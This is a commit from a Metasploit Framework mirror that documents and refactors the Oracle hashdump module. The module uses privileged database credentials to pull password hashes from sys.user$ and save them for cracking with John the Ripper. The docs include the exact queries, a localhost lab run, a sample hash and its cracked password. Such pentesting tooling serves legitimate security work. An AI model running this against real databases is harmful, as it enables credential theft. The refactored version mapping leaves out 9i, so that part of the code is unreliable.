infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Hashdump adheres to better coding style. Add docs

master
7043mcgeep 2019-03-25 02:36:34 -05:00
parent 170d28d46b
commit b91231021a
No known key found for this signature in database
GPG Key ID: CC4A7442B0463007
2 changed files with 151 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

108
documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md Normal file
View File

@ -0,0 +1,108 @@
## Preparation: 6 steps
1. Install Oracle Database and create a database. Versions 8i through 12c are supported.
2. On your Oracle DB machine, make sure you can ping the DB server using the `tnsping [SID]`
3. Make sure to create a user on the DB that has a known password, and sufficient privileges to select any table. This is necessary for getting the hashes.
4. Test that the module's hash query works locally. Once your user is created with sufficient privileges, connect to the DB as the user, and proceed to run this query if on 12c:
`SELECT name, spare4 FROM sys.user$ where password is not null and name <> \'ANONYMOUS\'` and this query if running an older version: `SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'`
5. Set up your MSF environment to support Oracle. You need gem ruby-oci8, as well as Oracle Instant Client. Tutorial here: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux
6. Make sure you have a database connected to MSF (postgresql). This can be done through `msfdb` tool or through `db_connect` command in `msfconsole`.
## Verification Steps
Example steps in this format (is also in the PR):
1. Start `msfconsole`
2. Do: ```use auxiliary/scanner/oracle/oracle_hashdump.rb```
3. Do: ```run```
4. If Oracle DB version is supported, the query will be attempted to get the hashes. Hash table is built and then saved as credentials.
5. You may view saved credentials with `creds` command. These are used for cracking by module `jtr_oracle_fast`.
## Options
**DBPASS**
The password to authenticate with. Change this from TIGER to the password of the privileged user created in step 3 of Preparation.
**DBUSER**
The username to authenticate with. Change this from SCOTT to the user you created who is granted privileges to select from the sys.user$ table
**RHOST**
The Oracle host. Change this to the IP address of the DB server.
**RHOSTS**
The target address range or CIDR identifier. If no CIDR notation is necessary, keep this value the same as RHOST.
**RPORT**
The TNS port of the Oracle DB server. By default, Oracle uses port 1521. Double-check the port of your Oracle DB.
**SID**
The Service ID (of the database) to authenticate with. Change this from ORCL (default Oracle install value) to your SID (if you changed the SID from default upon installation).
**THREADS**
The number of concurrent threads. Optional to change.
## Scenarios
### Running Oracle 12c on a local Windows 10 machine, and MSF5 on Ubuntu for Windows (same machine)
```
msf5 auxiliary(scanner/oracle/oracle_hashdump) > show options
Module options (auxiliary/scanner/oracle/oracle_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS hunter2 yes The password to authenticate with.
DBUSER scott yes The username to authenticate with.
RHOST 127.0.0.1 yes The Oracle host.
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 1522 yes The TNS port.
SID staticdb yes The sid to authenticate with.
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
[*] Server is running 12c
[*] Hash table :
Oracle Server Hashes
====================
Username Hash
-------- ----
...
SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699
...
[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
These hashes are then saved as credentials so that `jtr_oracle_fast` can crack them (using John The Ripper "bleeding_jumbo" branch via GitHub: https://github.com/magnumripper/JohnTheRipper).
Output of `creds` command:
```
msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ -------
... ----- ------------ ----------
127.0.0.1 127.0.0.1 1522/tcp (oracle) SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699 Nonreplayable hash oracle12c
...
```
`use auxiliary/analyze/jtr_oracle_fast`
`set JOHN_PATH /path/to/john`
`run`
```
...
[*] Cracking oracle12c hashes in normal wordlist mode...
Using default input encoding: UTF-8
[*] Cracking oracle12c hashes in single mode...
Using default input encoding: UTF-8
[*] Cracked passwords this run:
[+] SCOTT:hunter2
...
```

69
modules/auxiliary/scanner/oracle/oracle_hashdump.rb
View File

@ -15,7 +15,8 @@ class MetasploitModule < Msf::Auxiliary
'Description' => %Q{
This module dumps the usernames and password hashes
from Oracle given the proper Credentials and SID.
These are then stored as creds for later cracking.
These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast.
This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.
},
'Author' => ['theLightCosine'],
'License' => MSF_LICENSE
@ -25,26 +26,37 @@ class MetasploitModule < Msf::Auxiliary
def run_host(ip)
return if not check_dependencies
# Check for Version of Oracle DB. Behavior varies with Oracle DB version.
# 12c uses SHA-512, 11g uses SHA-1, 8g-10g use DES
is_11g=false
is_12c=false
# Checks for Version of Oracle. Behavior varies with oracle version.
# 12c uses SHA-512 (explained in more detail in report_hashes() below)
# 11g uses SHA-1 while 8i-10g use DES
query = 'select * from v$version'
ver = prepare_exec(query)
if ver.nil?
print_error("An Error has occurred, check your OPTIONS")
print_error("An Error has occurred. Check your OPTIONS")
return
end
unless ver.empty?
if ver[0].include?('11g')
is_11g=true
print_status("Server is running 11g")
elsif ver[0].include?('12c')
is_12c=true
print_status("Server is running 12c")
case
when ver[0].include?('8i')
ver='8i'
when ver[0].include?('9i')
ver='9i'
when ver[0].include?('10g')
ver='10g'
when ver[0].include?('11g')
ver='11g'
when ver[0].include?('12c')
ver='12c'
when ver[0].include?('18c')
print_error("Version 18c is not currently supported")
return
else
print_error("Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n#{ver[0]}")
return
end
print_status("Server is running version #{ver}")
end
this_service = report_service(
@ -60,9 +72,9 @@ class MetasploitModule < Msf::Auxiliary
'Columns' => ['Username', 'Hash']
)
# Get the usernames and hashes for 8g-10g
begin
if is_11g==false && is_12c==false
case ver
when '8i', '9i', '10g' # Get the usernames and hashes for 8i-10g
query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
results= prepare_exec(query)
unless results.empty?
@ -71,9 +83,8 @@ class MetasploitModule < Msf::Auxiliary
tbl << row
end
end
# Get the usernames and hashes for 11g or 12c. Query and table built the same way for both of these versions
elsif is_11g==true || is_12c==true
query='SELECT name, spare4 FROM sys.user$ where password is not null and name <> \'ANONYMOUS\''
when '11g', '12c' # Get the usernames and hashes for 11g or 12c
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
results= prepare_exec(query)
#print_status("Results: #{results.inspect}")
unless results.empty?
@ -85,23 +96,28 @@ class MetasploitModule < Msf::Auxiliary
end
end
rescue => e
print_error("An error occurred. The supplied credentials may not have proper privs")
print_error("An error occurred. The supplied credentials may not have proper privileges")
return
end
print_status("Hash table :\n #{tbl}")
report_hashes(tbl, is_11g, is_12c, ip, this_service)
report_hashes(tbl, ver, ip, this_service)
end
def report_hashes(table, is_11g, is_12c, ip, service)
# Reports the hashes slightly differently, depending on the version
# This is so that we know which are which when we go to crack them
if is_11g==false
# Save each row in the hash table as credentials (shown by "creds" command)
# This is done slightly differently, depending on the version
def report_hashes(table, ver, ip, service)
# Before module jtr_oracle_fast cracks these hashes, they are converted (based on jtr_format)
# to a format that John The Ripper can handle. This format is stored here.
case ver
when '8i', '10g'
jtr_format = "des,oracle"
elsif is_12c==true
jtr_format = "oracle12c"
else
when '11g'
jtr_format = "raw-sha1,oracle11"
when '12c'
jtr_format = "oracle12c"
end
service_data = {
address: Rex::Socket.getaddress(ip),
port: service[:port],
@ -110,6 +126,7 @@ class MetasploitModule < Msf::Auxiliary
workspace_id: myworkspace_id
}
# For each row in the hash table, save its corresponding credential data and JTR format
table.rows.each do |row|
credential_data = {
origin_type: :service,